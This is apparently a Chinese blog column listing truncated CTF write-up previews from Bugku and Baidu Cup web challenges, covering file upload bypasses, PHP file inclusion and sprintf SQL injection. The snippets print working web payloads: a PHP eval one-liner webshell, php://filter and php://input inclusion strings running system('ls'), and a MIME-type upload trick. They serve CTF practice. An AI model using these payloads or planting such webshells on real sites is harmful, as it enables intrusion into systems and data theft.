ctf-wp
关注
分享
扫一扫
zc01@
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
ctf-wp-第三届“百越杯”福建省高校网络空间安全大赛 Do you know upload?
考察:文件上传漏洞、数据库基本操作访问url :只能上传图片文件试着上传大马,burp抓包:尝试修改文件类型为:image/jpeg结果上传成功:访问大马:发现有个ctf.sql 。flag应该在数据库中,看看config.php,找到数据库连接方法:执行一下sql语句:看看都有那些表存在flag表,看看内容:bingo...原创 2018-09-28 14:17:16 · 1418 阅读 · 0 评论 -
ctf-writeup-迎圣诞拿大奖-SQLi
打开连接,出现一个登录框:尝试:扫目录、弱口令、源代码都没有什么发现题目为sqli 猜测sql注入应该在登录处,转包丢sqlmap先跑一发,也没有结果。尝试手工测一下,发现在用户名处输入%时居然有报错!看报错提示,有sprintf()错误,瞬间想起了这个函数有格式化字符串漏洞,抓包尝试一番。sprintf注入,或者说php格式化字符串注入的原理为:要明白%后的一个字符(除了%,%...原创 2019-08-06 14:10:58 · 426 阅读 · 0 评论 -
wp-bugku-秋名山老司机
打开连接提示要两秒钟计算出一个变态的表达式先抓个包看看只能上脚本了import requestsimport re //这个库一般用来匹配文字url = 'http://123.206.87.240:8002/qiumingshan/' //urlr = requests.session() //requests.sesssion()对象可以跨请求的保存某些参数g = ...原创 2019-03-12 15:45:57 · 1434 阅读 · 1 评论 -
wp-bugku-web6(速度要快)
打开连接看到没内容:burp抓包:看到一串base64加密的字符串:解密得到:“跑的还不错,给你flag吧: MzA0NjEx”go几次发现是会变的只能上脚本了:import requestsimport base64 url='http://123.206.87.240:8002/web6/'s=requests.Session()a=s.get('url').heade...原创 2019-03-15 16:57:52 · 1072 阅读 · 0 评论 -
wp-bugku-flag在index.php中
打开连接查看源码发现:文件包含。使用php://filter读取index.php的源代码构造payload:index.php?file=php://filter/read=convent.base64-encode/resource=index.php得到index.php源代码的base64解密得到源代码:<html> <title>...原创 2019-03-11 15:19:06 · 561 阅读 · 0 评论 -
wp-bugku-变量1
打开url出现一段代码:flag In the variable ! <?php //提示flag在变量中error_reporting(0); //关闭错误显示include "flag1.php"; //包含flag1.phphighlight_file(__file__); //代码高亮if(isset($_GET['args'])){ //判断a...原创 2019-03-11 12:14:08 · 612 阅读 · 0 评论 -
wp-bugku-矛盾
打开连接得到几行代码要求num不是数字,并且num等于1.这道题考察php不会判断两边的表达式类型;(PHP 支持 >(大于),>=(大于等于),(等于),!=(不等于),<(小于),<= (小于等于)。PHP 还支持全等运算符 =(值和类型均相同)和非全等运算符 !(值或者类型不同)。)所以构造的num值1d(d可以是任意字符)...原创 2019-03-11 10:22:41 · 287 阅读 · 0 评论 -
WP-bugku-web3(窗口无法关闭问题)
打开url发现弹出窗口无法关闭:思路:考虑javascript脚本问题,先停用javascript试试:firefox里面关闭javascript方法:F12打开开发者工具–>设置–>Disable javascript,如图:此时发现弹窗消失,查看网页源码得到一串Unicode,解密后得到flag!...原创 2019-03-11 10:01:12 · 203 阅读 · 0 评论 -
ctf-wp-ssh私钥泄露
下载靶机之后进不去,这时候需要知道靶机的ip地址,kaili里面使用netdiscover工具,查找局域网内的主机。命令:netdiscover结果: Currently scanning: 172.16.96.0/16 | Screen View: Unique Hosts ...原创 2019-07-30 14:22:22 · 524 阅读 · 0 评论 -
cft-wp-百度杯CTF比赛 九月场(upload)
打开连接 发现有个上传功能:上传一句话试试:&amp;amp;lt;?php @eval($_POST['pass']);?&amp;amp;gt;发现没有路径,看下源码:找到路径,上菜刀提示连不上,猜测可能有过滤,或者文件不能被解析,先访问一下看看发现&amp;amp;lt;?php 被过滤了。。翻阅资料找到一种php标记方法,将一句话改为:&amp;amp;lt;script language=&原创 2018-09-30 14:59:58 · 1124 阅读 · 0 评论 -
ctf-wp-百度杯CTF比赛 2017 二月场 include
考察文件包含打开题目:发现 allow_url_include on直接构造?path=php://inputpost参数<?php echo system('ls');?>列出文件名看看:发现有个奇怪的文件:dle345aae.php查看此文件内容:使用php://filter协议查看曝露出来的文件的内容,因为PHP文件不能直接显示内容所以先base64显示出来,然后...原创 2018-09-30 14:04:59 · 1276 阅读 · 0 评论 -
ctf-wirteup-百度杯九月场-123
打开连接:发现一处登录,查看源代码:提示用户名密码相关信息,用户名都在user.php中查看备份文件,能否获取到user的备份文件:经尝试文件为:user.php.bak抓包进行爆破:爆破成功:账号为lixiuyun 密码为:lixiuyun1990登录成功:发现一个空页面查看源代码:本地创建html上传文件抓包:尝试后缀名绕过:pht成功绕过:又提示...原创 2019-10-11 16:41:06 · 364 阅读 · 0 评论